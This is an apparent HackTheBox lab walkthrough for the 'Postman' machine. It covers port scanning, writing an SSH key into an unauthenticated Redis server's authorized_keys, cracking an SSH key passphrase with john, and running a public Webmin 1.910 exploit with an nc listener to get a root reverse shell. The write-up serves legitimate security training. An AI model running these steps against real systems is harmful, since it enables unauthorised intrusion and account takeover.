Postman HTB

IP

10.10.10.160

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.160 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the target machine

22,80,6379,10000

Lets run a more in-depth scan of these ports

sudo nmap -sCV -p22,80,6379,10000 -oA port_scan 10.10.10.160

results

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.78 seconds

we can see

• Port 80 http server Apache version 2.4.29

• Port 6379 Redis: is an in-memory, key/value store, works much like a dictionary with a number of keys and corresponding values that can both be set and retrieved, essentially servers as a data structure server

  • Possibly vulnerable to RCE

• Port 10000 MiniServ 1.910: web-based server management control panel for unix like systems

  • Possible vulnerable to RCE

Let's check out the HTTP server

let's run nikto and feroxbuster in the background and continue enumerating

ferox results (most interesting)

feroxbuster -u http://10.10.10.160 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt

http://10.10.10.160/upload/
http://10.10.10.160/css/
http://10.10.10.160/js/

nikto result

nikto --host http://10.10.10.160 > nikto_scan

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.10.160
+ Target Hostname:    10.10.10.160
+ Target Port:        80
+ Start Time:         2023-12-30 03:42:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: f04, size: 590f549ce0d74, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8048 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-12-30 03:46:22 (GMT-5) (234 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Not a whole lot here

REDIS

We can check if we can connect to the reddis server by using the following tools

redis-cli -h 10.10.10.160

we are given anonymous authentication (no authentication is in place)

we try and kind any keys on the server

keys *

• returns nothing

Maybe we can write a ssh key to the

Lets check the current directory for redis

config get dir

We can make a educated guess and say this is most likely the redis home directory, we can confirm this by changing the current directory to ./.ssh

10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir ./.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"

Now that we can see our commands do prove the exsistence of the .ssh dirtectory, making this the redis home directory, Next we can create a ssh key and place this in the redis .ssh directory

here is a great blog that explains the steps https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419)

1. Lets generate our key pairs

ssh-keygen -t rsa

1. Next we want to place our public key into temp.txt , we also want to add 2 blank line both before and after our text

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > temp.txt

1. Now we need to place our public key to the redis server, for this we will use the tool redis-cli

cat temp.txt | redis-cli -h 10.10.10.160 -x set s-key

redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK

1. Now we should give the appropriate permissions to our private key and now be able to authenticate via SSH with our private key as Redis

chmod 600 id_rsa
ssh -i id_rsa redis@10.10.10.160

Now we have a SSH session as the user redis

Priv esc via redis

we do find a ssh private key within the /opt directory

we can copy this over to our local machine and possibly crack the password

1. first lets generate a crackable hash using ssh2john

sudo /opt/john/run/ssh2john.py id_rsa > hash

1. we can crack the hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

we get the password

computer2008

1. We coulnt ssh in, but in our already establsihed shell as redis we can just change over to the user Matt by

su Matt

we now have a session as Matt

miniserv

When we navigate to https://10.10.10.160:10000 we can see the following

we can try Matts credentials

Matt: computer2008

we have access to the dashboard

Looking around we can use the following script

GitHub - roughiz/Webmin-1.910-Exploit-Script: Webmin 1.910 - Remote Code Execution Using Python ScriptGitHub

1. Lets start a listner

rlwrap -cAr nc -lvnp 9001

1. lets run the exploit script

 python2 webmin_exploit.py --rhost 10.10.10.160 --rport 10000 --lhost 10.10.14.2 --lport 9001 -u Matt -p computer2008 -s true

1. We should see within our listner we have a shell as root